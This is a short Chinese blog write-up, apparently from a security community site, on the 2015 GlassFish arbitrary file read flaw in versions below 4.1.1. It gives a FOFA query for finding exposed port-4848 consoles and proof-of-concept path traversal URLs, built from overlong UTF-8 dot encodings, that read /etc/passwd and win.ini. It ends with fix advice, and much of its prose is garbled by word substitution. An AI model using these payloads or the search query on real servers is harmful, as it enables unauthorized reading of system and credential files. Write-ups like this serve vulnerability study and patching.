GlassFish 任意文件读取漏洞复现

破绽描绘

GlassFish 是一款用于构建 Java EE的应用效劳组件。2015年10月,被爆出通用恣意文件读取破绽。应用这个破绽,攻击者可读取效劳器上恣意文件。
 


 

影响版本

GlassFish< 4.1.1
 


 

破绽复现

fofa上搜索

"GlassFish" && port="4848"

 

POC考证

#linux效劳器

http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

#windows效劳器

http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini

依据 POC 考证,胜利恣意文件读取。

图片[1]-GlassFish 任意文件读取漏洞复现-孤勇者社区


 

修复倡议

关闭远程管理关闭远程管理,关闭后只允许本地访问。
官方曾经发布更新修复
下载地址:https://glassfish.java.net/download.html
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞11赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片